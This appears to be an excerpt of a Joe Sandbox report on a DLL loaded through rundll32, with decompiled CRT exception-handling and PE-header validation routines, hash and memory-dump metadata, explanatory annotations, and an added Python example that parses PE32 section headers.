                    • API String ID: 3997070919-0
                    • Opcode ID: d0648db9ea43100c0ede80a699b09f6878dd11292bfebb7c739f28af452d8c76
                    • Instruction ID: 5a753270751a014ca4481ecc468326e0db649e76234c9ac31a24c05dc5d03d27
                    • Opcode Fuzzy Hash: d0648db9ea43100c0ede80a699b09f6878dd11292bfebb7c739f28af452d8c76
                    • Instruction Fuzzy Hash: F9B114322106099FE715CF28C486E997BF6FF45764F25865DE89ACF2A1C335E982CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E6FFA2495(long _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				short* _v32;
                    				void _v36;
                    				void* _t57;
                    				signed int _t58;
                    				signed int _t61;
                    				signed int _t62;
                    				void* _t63;
                    				signed int* _t68;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr _t72;
                    				intOrPtr _t75;
                    				void* _t76;
                    				signed int _t77;
                    				void* _t78;
                    				void _t80;
                    				signed int _t81;
                    				signed int _t84;
                    				signed int _t86;
                    				short* _t87;
                    				void* _t89;
                    				signed int* _t90;
                    				long _t91;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t100;
                    				signed int _t102;
                    				void* _t104;
                    				long _t108;
                    				signed int _t110;
                    
                    				_t108 = _a4;
                    				_t76 =  *(_t108 + 8);
                    				if((_t76 & 0x00000003) != 0) {
                    					L3:
                    					return 0;
                    				}
                    				_a4 =  *[fs:0x4];
                    				_v8 =  *[fs:0x8];
                    				if(_t76 < _v8 || _t76 >= _a4) {
                    					_t102 =  *(_t108 + 0xc);
                    					__eflags = _t102 - 0xffffffff;
                    					if(_t102 != 0xffffffff) {
                    						_t91 = 0;
                    						__eflags = 0;
                    						_a4 = 0;
                    						_t57 = _t76;
                    						do {
                    							_t80 =  *_t57;
                    							__eflags = _t80 - 0xffffffff;
                    							if(_t80 == 0xffffffff) {
                    								goto L9;
                    							}
                    							__eflags = _t80 - _t91;
                    							if(_t80 >= _t91) {
                    								L20:
                    								_t63 = 0;
                    								L60:
                    								return _t63;
                    							}
                    							L9:
                    							__eflags =  *(_t57 + 4);
                    							if( *(_t57 + 4) != 0) {
                    								_t12 =  &_a4;
                    								 *_t12 = _a4 + 1;
                    								__eflags =  *_t12;
                    							}
                    							_t91 = _t91 + 1;
                    							_t57 = _t57 + 0xc;
                    							__eflags = _t91 - _t102;
                    						} while (_t91 <= _t102);
                    						__eflags = _a4;
                    						if(_a4 == 0) {
                    							L15:
                    							_t81 =  *0x6ffa41f8;
                    							_t110 = _t76 & 0xfffff000;
                    							_t58 = 0;
                    							__eflags = _t81;
                    							if(_t81 <= 0) {
                    								L18:
                    								_t104 = _t102 | 0xffffffff;
                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                    								__eflags = _t61;
                    								if(_t61 < 0) {
                    									_t62 = 0;
                    									__eflags = 0;
                    								} else {
                    									_t62 = _a4;
                    								}
                    								__eflags = _t62;
                    								if(_t62 == 0) {
                    									L59:
                    									_t63 = _t104;
                    									goto L60;
                    								} else {
                    									__eflags = _v12 - 0x1000000;
                    									if(_v12 != 0x1000000) {
                    										goto L59;
                    									}
                    									__eflags = _v16 & 0x000000cc;
                    									if((_v16 & 0x000000cc) == 0) {
                    										L46:
                    										_t63 = 1;
                    										 *0x6ffa4240 = 1;
                    										__eflags =  *0x6ffa4240;
                    										if( *0x6ffa4240 != 0) {
                    											goto L60;
                    										}
                    										_t84 =  *0x6ffa41f8;
                    										__eflags = _t84;
                    										_t93 = _t84;
                    										if(_t84 <= 0) {
                    											L51:
                    											__eflags = _t93;
                    											if(_t93 != 0) {
                    												L58:
                    												 *0x6ffa4240 = 0;
                    												goto L5;
                    											}
                    											_t77 = 0xf;
                    											__eflags = _t84 - _t77;
                    											if(_t84 <= _t77) {
                    												_t77 = _t84;
                    											}
                    											_t94 = 0;
                    											__eflags = _t77;
                    											if(_t77 < 0) {
                    												L56:
                    												__eflags = _t84 - 0x10;
                    												if(_t84 < 0x10) {
                    													_t86 = _t84 + 1;
                    													__eflags = _t86;
                    													 *0x6ffa41f8 = _t86;
                    												}
                    												goto L58;
                    											} else {
                    												do {
                    													_t68 = 0x6ffa4200 + _t94 * 4;
                    													_t94 = _t94 + 1;
                    													__eflags = _t94 - _t77;
                    													 *_t68 = _t110;
                    													_t110 =  *_t68;
                    												} while (_t94 <= _t77);
                    												goto L56;
                    											}
                    										}
                    										_t69 = 0x6ffa41fc + _t84 * 4;
                    										while(1) {
                    											__eflags =  *_t69 - _t110;
                    											if( *_t69 == _t110) {
                    												goto L51;
                    											}
                    											_t93 = _t93 - 1;
                    											_t69 = _t69 - 4;
                    											__eflags = _t93;
                    											if(_t93 > 0) {
                    												continue;
                    											}
                    											goto L51;
                    										}
                    										goto L51;
                    									}
                    									// Editor's annotations (not decompiler output): from here the routine walks the PE
                    									// headers of the module at _v32 and tests whether the address in _t76 falls in a
                    									// writable section. This is the registration/scope-table validation that the SEH
                    									// frame handler at 6FFA2274 (further down) calls as E6FFA2495, i.e. statically
                    									// linked CRT support code, not sample-specific logic.
                    									_t87 = _v32;
                    									__eflags =  *_t87 - 0x5a4d;
                    									if( *_t87 != 0x5a4d) { // IMAGE_DOS_HEADER.e_magic != 'MZ'
                    										goto L59;
                    									}
                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87; // e_lfanew -> IMAGE_NT_HEADERS
                    									__eflags =  *_t71 - 0x4550;
                    									if( *_t71 != 0x4550) { // Signature != 'PE\0\0'
                    										goto L59;
                    									}
                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                    									if( *((short*)(_t71 + 0x18)) != 0x10b) { // OptionalHeader.Magic != PE32 (PE32+ rejected)
                    										goto L59;
                    									}
                    									_t78 = _t76 - _t87; // RVA of the address being validated
                    									__eflags =  *((short*)(_t71 + 6)); // FileHeader.NumberOfSections
                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18; // first IMAGE_SECTION_HEADER, past SizeOfOptionalHeader
                    									if( *((short*)(_t71 + 6)) <= 0) {
                    										goto L59;
                    									}
                    									_t72 =  *((intOrPtr*)(_t89 + 0xc)); // section[0].VirtualAddress
                    									__eflags = _t78 - _t72;
                    									if(_t78 < _t72) { // RVA below section[0]: not in a writable section
                    										goto L46;
                    									}
                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72; // section[0].VirtualAddress + VirtualSize
                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) { // RVA past section[0]: only section[0] is examined
                    										goto L46;
                    									}
                    									__eflags =  *(_t89 + 0x27) & 0x00000080; // top byte of Characteristics: IMAGE_SCN_MEM_WRITE (0x80000000)
                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) { // address lies in a writable section
                    										goto L20;
                    									}
                    									goto L46;
                    								}
                    							} else {
                    								goto L16;
                    							}
                    							while(1) {
                    								L16:
                    								__eflags =  *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) - _t110;
                    								if( *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) == _t110) {
                    									break;
                    								}
                    								_t58 = _t58 + 1;
                    								__eflags = _t58 - _t81;
                    								if(_t58 < _t81) {
                    									continue;
                    								}
                    								goto L18;
                    							}
                    							__eflags = _t58;
                    							if(_t58 <= 0) {
                    								goto L5;
                    							}
                    							 *0x6ffa4240 = 1;
                    							__eflags =  *0x6ffa4240;
                    							if( *0x6ffa4240 != 0) {
                    								goto L5;
                    							}
                    							__eflags =  *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) - _t110;
                    							if( *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) == _t110) {
                    								L32:
                    								_t100 = 0;
                    								__eflags = _t58;
                    								if(_t58 < 0) {
                    									L34:
                    									 *0x6ffa4240 = 0;
                    									goto L5;
                    								} else {
                    									goto L33;
                    								}
                    								do {
                    									L33:
                    									_t90 = 0x6ffa4200 + _t100 * 4;
                    									_t100 = _t100 + 1;
                    									__eflags = _t100 - _t58;
                    									 *_t90 = _t110;
                    									_t110 =  *_t90;
                    								} while (_t100 <= _t58);
                    								goto L34;
                    							}
                    							_t58 = _t81 - 1;
                    							__eflags = _t58;
                    							if(_t58 < 0) {
                    								L28:
                    								__eflags = _t81 - 0x10;
                    								if(_t81 < 0x10) {
                    									_t81 = _t81 + 1;
                    									__eflags = _t81;
                    									 *0x6ffa41f8 = _t81;
                    								}
                    								_t58 = _t81 - 1;
                    								goto L32;
                    							} else {
                    								goto L25;
                    							}
                    							while(1) {
                    								L25:
                    								__eflags =  *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) - _t110;
                    								if( *((intOrPtr*)(0x6ffa4200 + _t58 * 4)) == _t110) {
                    									break;
                    								}
                    								_t58 = _t58 - 1;
                    								__eflags = _t58;
                    								if(_t58 >= 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							__eflags = _t58;
                    							if(__eflags >= 0) {
                    								if(__eflags == 0) {
                    									goto L34;
                    								}
                    								goto L32;
                    							}
                    							goto L28;
                    						}
                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                    						__eflags = _t75 - _v8;
                    						if(_t75 < _v8) {
                    							goto L20;
                    						}
                    						__eflags = _t75 - _t108;
                    						if(_t75 >= _t108) {
                    							goto L20;
                    						}
                    						goto L15;
                    					}
                    					L5:
                    					_t63 = 1;
                    					goto L60;
                    				} else {
                    					goto L3;
                    				}
                    			}
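The header walk in the routine above (the 0x5a4d, 0x4550 and 0x10b checks, then the first section header and the 0x80 bit of its Characteristics) is easier to follow against a readable reimplementation. The following Python is an added example written for this page, not code from the analysed sample or from Joe Sandbox: it applies the same DOS/NT/optional-header validation to an in-memory PE32 image, reports which section contains a given RVA and whether that section carries IMAGE_SCN_MEM_WRITE. It generalises the decompiled code in one respect: the routine above examines only section[0], while this version checks every section header. The constants are standard PE values, the sample image is constructed inline (headers only), and the function names are the editor's own.

```python
import struct

# Standard PE constants for the fields the decompiled routine tests.
IMAGE_DOS_SIGNATURE = 0x5A4D            # 'MZ'    : the 0x5a4d check
IMAGE_NT_SIGNATURE = 0x00004550         # 'PE\0\0': the 0x4550 check
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B   # PE32    : the 0x10b check (PE32+ is rejected)
IMAGE_SCN_MEM_WRITE = 0x80000000        # bit 31  : the "byte at +0x27 & 0x80" check
SECTION_HEADER_SIZE = 40                # sizeof(IMAGE_SECTION_HEADER)


def parse_sections(image):
    """Validate the DOS and NT headers the way the decompiled code does and return
    [(name, virtual_address, virtual_size, characteristics), ...], or None when a
    header check fails (the routine's L59 path)."""
    if len(image) < 0x40 or struct.unpack_from("<H", image, 0)[0] != IMAGE_DOS_SIGNATURE:
        return None
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]          # IMAGE_DOS_HEADER.e_lfanew
    if e_lfanew + 0x1A > len(image):
        return None
    if struct.unpack_from("<I", image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        return None
    # IMAGE_FILE_HEADER: NumberOfSections at +6, SizeOfOptionalHeader at +0x14
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 0x14)[0]
    # IMAGE_OPTIONAL_HEADER.Magic sits at +0x18
    if struct.unpack_from("<H", image, e_lfanew + 0x18)[0] != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        return None
    if num_sections == 0:
        return None
    first = e_lfanew + 0x18 + opt_size   # &IMAGE_SECTION_HEADER[0] (the _t89 computation)
    sections = []
    for i in range(num_sections):
        off = first + i * SECTION_HEADER_SIZE
        if off + SECTION_HEADER_SIZE > len(image):
            return None
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", image, off + 8)   # VirtualSize (+8), VirtualAddress (+0xC)
        chars = struct.unpack_from("<I", image, off + 0x24)[0]     # Characteristics (+0x24)
        sections.append((name, vaddr, vsize, chars))
    return sections


def section_for_rva(image, rva):
    """Return (name, characteristics) of the section covering `rva`, or None if the
    headers are invalid or the RVA is outside every section (e.g. in the headers)."""
    sections = parse_sections(image)
    if sections is None:
        return None
    for name, vaddr, vsize, chars in sections:
        if vaddr <= rva < vaddr + vsize:
            return name, chars
    return None


def is_writable_rva(image, rva):
    """True only when `rva` lies inside a section with IMAGE_SCN_MEM_WRITE set, the
    condition that sends the decompiled routine to L20 instead of L46."""
    hit = section_for_rva(image, rva)
    return hit is not None and bool(hit[1] & IMAGE_SCN_MEM_WRITE)


def build_sample_pe32():
    """Constructed sample (not taken from the analysed file): a headers-only PE32
    image with a read/execute .text at RVA 0x1000 and a read/write .data at 0x2000."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    opt_size = 0xE0                                                # sizeof(IMAGE_OPTIONAL_HEADER32)
    # Signature, Machine (i386), NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (EXECUTABLE_IMAGE|32BIT|DLL)
    file_hdr = struct.pack("<IHHIIIHH", IMAGE_NT_SIGNATURE, 0x14C, 2, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)

    def section(name, vaddr, vsize, chars):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations,
        # PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, 0, 0, 0, 0, 0, 0, chars)

    text = section(b".text", 0x1000, 0x1000, 0x60000020)   # CODE | MEM_EXECUTE | MEM_READ
    data = section(b".data", 0x2000, 0x1000, 0xC0000040)   # INITIALIZED_DATA | MEM_READ | MEM_WRITE
    return bytes(dos) + file_hdr + bytes(opt) + text + data


if __name__ == "__main__":
    img = build_sample_pe32()
    for rva in (0x10, 0x1234, 0x2010, 0x9000):
        hit = section_for_rva(img, rva)
        print(hex(rva), hit, "writable" if is_writable_rva(img, rva) else "not writable")
```

On a live process the image base would come from the AllocationBase field that NtQueryVirtualMemory fills in for information class 0 (MemoryBasicInformation, 0x1C-byte buffer on x86, matching the call listed under APIs for this function); the parsing of the headers is the same once that base is known.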

                    APIs
                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6FFA2546
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: MemoryQueryVirtual
                    • String ID:
                    • API String ID: 2850889275-0
                    • Opcode ID: 3d9b1a5ad9c647021a4abc2868f82dfcc30f40fea0bbb9016e0e7a22ea76e576
                    • Instruction ID: 90f3507f325a2d6ff1c86a160074714cdcc9dff5daceddd9ce05b69f8bc7f544
                    • Opcode Fuzzy Hash: 3d9b1a5ad9c647021a4abc2868f82dfcc30f40fea0bbb9016e0e7a22ea76e576
                    • Instruction Fuzzy Hash: 0B61C031755602CFDB1ACF2AD9E079933F5FF85714B20817AD816CB2A4EB73E8828650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 31f6e96a2df7f0376f5b90bea5a2bd87dd88efd779f5d7f0c60802a4847d05e3
                    • Instruction ID: f48b805ddf8587c33136493ffd3a8240debb2e16eec1139d9c37d0d24868cf8f
                    • Opcode Fuzzy Hash: 31f6e96a2df7f0376f5b90bea5a2bd87dd88efd779f5d7f0c60802a4847d05e3
                    • Instruction Fuzzy Hash: 4F41A6B580425DAFEB10DF69CC89AEEBBB9AF45614F1442EDE40DE3201DB359E858F10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • EnumSystemLocalesW.KERNEL32(70011FD6,00000001,00000000,?,-00000050,?,70012604,00000000,?,?,?,00000055,?), ref: 70011F22
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 58c50ea9e91f0ead26990e61c9d0e794f2cdfa18ff198236aa2d6400ef3e1334
                    • Instruction ID: de4f0d2f4ccb7c30b0b512e8ce4fb64abb5b641bcede3e470d2fc57b8660e820
                    • Opcode Fuzzy Hash: 58c50ea9e91f0ead26990e61c9d0e794f2cdfa18ff198236aa2d6400ef3e1334
                    • Instruction Fuzzy Hash: 3211A3362047069FDB189F7989916AEB7E2FB80668B14442CE98787B40E3716943C740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • EnumSystemLocalesW.KERNEL32(70012229,00000001,?,?,-00000050,?,700125C8,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 70011F95
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 7d55dab1a620617b54d7bacab5b71714081cf79da7eff1be03cd96e49b8e72a6
                    • Instruction ID: 7c047649852938bb4a07b6a0609b902fe1d0cdbb84055eac41721dde380f5a16
                    • Opcode Fuzzy Hash: 7d55dab1a620617b54d7bacab5b71714081cf79da7eff1be03cd96e49b8e72a6
                    • Instruction Fuzzy Hash: A9F04C323043055FD7094F75E8846AE7BE2EF80778B14443CF9464B690C771AC42C600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 70006CEC: RtlEnterCriticalSection.NTDLL(-000EC664), ref: 70006CFB
                    • EnumSystemLocalesW.KERNEL32(70009918,00000001,70045F00,0000000C,70009D05,00000000), ref: 7000995D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: f08147566c04b759462f4a4a57da4f3004185092c7c4d8f27bd9013595f28288
                    • Instruction ID: 953109906e3d3f6c5bbd161f3d0b974d822db8dc1282a4d31d1d4618b06feb4e
                    • Opcode Fuzzy Hash: f08147566c04b759462f4a4a57da4f3004185092c7c4d8f27bd9013595f28288
                    • Instruction Fuzzy Hash: A3F03732A44204EFE700DF99D881B9D77B0FB45B32F20456AF8149B2A1CB7659408B41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • EnumSystemLocalesW.KERNEL32(70011DBE,00000001,?,?,?,70012626,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 70011E9C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 95992fcd694a572e76b77485a018ff2750b466a0a561b229b727339e9d7581b2
                    • Instruction ID: e368fc46dd1b0dadf24caabc27884f615e2eee6d8e838f4e1d6a76bd41f283ca
                    • Opcode Fuzzy Hash: 95992fcd694a572e76b77485a018ff2750b466a0a561b229b727339e9d7581b2
                    • Instruction Fuzzy Hash: 5EF0EC3630010657DB099F75D9457AE7FF5EFC1A30B064058EE068B390C6319C82C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7000B990,?,20001004,00000000,00000002,?,?,7000AF7B), ref: 70009E3D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 7c3fb84d636dfe2f33d0213cc7fbcfcbdcfd7cb12ec36cb2d00e75e4562734f8
                    • Instruction ID: c95cb7f3a2a632b913c763baa9613c0086f8547e971b59b86df26cc9dd58a7f6
                    • Opcode Fuzzy Hash: 7c3fb84d636dfe2f33d0213cc7fbcfcbdcfd7cb12ec36cb2d00e75e4562734f8
                    • Instruction Fuzzy Hash: 07E04F32540118BFEF129F61DC08AAE3F6AEF45B70F108010FD0966221CB729E21AAD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E6FFA2274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                    				intOrPtr _v8;
                    				char _v12;
                    				void* __ebp;
                    				signed int* _t43;
                    				char _t44;
                    				void* _t46;
                    				void* _t49;
                    				intOrPtr* _t53;
                    				void* _t54;
                    				void* _t65;
                    				long _t66;
                    				signed int* _t80;
                    				signed int* _t82;
                    				void* _t84;
                    				signed int _t86;
                    				void* _t89;
                    				void* _t95;
                    				void* _t96;
                    				void* _t99;
                    				void* _t106;
                    
                    				_t43 = _t84;
                    				_t65 = __ebx + 2;
                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                    				_t89 = _t95;
                    				_t96 = _t95 - 8;
                    				_push(_t65);
                    				_push(_t84);
                    				_push(_t89);
                    				asm("cld");
                    				// Editor's annotations (not decompiler output): the layout below is the x86 SEH frame
                    				// handler pattern of the statically linked CRT (_except_handler3-style scope-table
                    				// dispatch): _a4 = EXCEPTION_RECORD*, _a8 = EH3 registration record, _a12 = CONTEXT*.
                    				_t66 = _a8;
                    				_t44 = _a4;
                    				if(( *(_t44 + 4) & 0x00000006) != 0) { // ExceptionFlags & (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND): unwind pass
                    					_push(_t89);
                    					E6FFA23DB(_t66 + 0x10, _t66, 0xffffffff); // local unwind of every try level (trylevel -1)
                    					_t46 = 1;
                    				} else {
                    					_v12 = _t44; // EXCEPTION_POINTERS.ExceptionRecord
                    					_v8 = _a12;  // EXCEPTION_POINTERS.ContextRecord
                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12; // saved below the registration record for the filter's GetExceptionInformation()
                    					_t86 =  *(_t66 + 0xc); // current trylevel
                    					_t80 =  *(_t66 + 8);   // scope table (12-byte entries: EnclosingLevel, FilterFunc, HandlerFunc)
                    					_t49 = E6FFA2495(_t66); // validate the registration record: the PE-header / NtQueryVirtualMemory routine above
                    					_t99 = _t96 + 4;
                    					if(_t49 == 0) {
                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                    						goto L11;
                    					} else {
                    						while(_t86 != 0xffffffff) { // walk outward until TRYLEVEL_NONE (-1)
                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4)); // scopetable[trylevel].FilterFunc
                    							if(_t53 == 0) { // no filter: a __finally level, skipped on the dispatch pass
                    								L8:
                    								_t80 =  *(_t66 + 8);
                    								_t86 = _t80[_t86 + _t86 * 2]; // trylevel = scopetable[trylevel].EnclosingLevel
                    								continue;
                    							} else {
                    								_t54 =  *_t53();
                    								_t89 = _t89;
                    								_t86 = _t86;
                    								_t66 = _a8;
                    								_t55 = _t54;
                    								_t106 = _t54;
                    								if(_t106 == 0) {
                    									goto L8;
                    								} else {
                    									if(_t106 < 0) { // filter returned EXCEPTION_CONTINUE_EXECUTION
                    										_t46 = 0; // ExceptionContinueExecution
                    									} else {
                    										// filter returned EXCEPTION_EXECUTE_HANDLER: unwind, then run the __except block
                    										_t82 =  *(_t66 + 8);
                    										E6FFA2380(_t55, _t66); // global unwind down to this registration record
                    										_t89 = _t66 + 0x10;
                    										E6FFA23DB(_t89, _t66, 0); // local unwind of the levels inside the matching try
                    										_t99 = _t99 + 0xc;
                    										E6FFA2477(_t82[2]); // NLG notification with the handler address
                    										 *(_t66 + 0xc) =  *_t82; // trylevel = EnclosingLevel of the matching entry
                    										_t66 = 0;
                    										_t86 = 0;
                    										 *(_t82[2])(1); // scopetable[trylevel].HandlerFunc; does not return
                    										goto L8;
                    									}
                    								}
                    							}
                    							goto L13;
                    						}
                    						L11:
                    						_t46 = 1; // ExceptionContinueSearch
                    					}
                    				}
                    				L13:
                    				return _t46;
                    			}

                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction ID: 97f4ce6711ee7d81dea9afc1dbd3decbe7208f836cc6894add6e320c2c2e6d5a
                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction Fuzzy Hash: B121C432A00704DBD700DF69C8C09ABB7A5FF49350B4581A9D8599B245DB32FA15C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000017.00000002.882581732.000000007004A000.00000040.00000001.01000000.0000000C.sdmp, Offset: 7004A000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7004a000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                    • Instruction ID: 9ad0f6642d70298a358e6af5b5da2e682fde531b1adde0a70d030f1ba756e1e6
                    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                    • Instruction Fuzzy Hash: 671181733405009FD754CE59EC81EAA73EAEBDA630725806AED04CB305D676EC51C7A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000017.00000002.882581732.000000007004A000.00000040.00000001.01000000.0000000C.sdmp, Offset: 7004A000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_7004a000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                    • Instruction ID: 06a0a3fa1bca52f641daa0c10f05c7c741a07ee23042c63e25862fa1379e921a
                    • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                    • Instruction Fuzzy Hash: 540104723042458FD719CB18D98496EB7F9EBC3A34B15907EE447C3615D520EC46C924
                    Uniqueness

                    Uniqueness Score: -1.00%

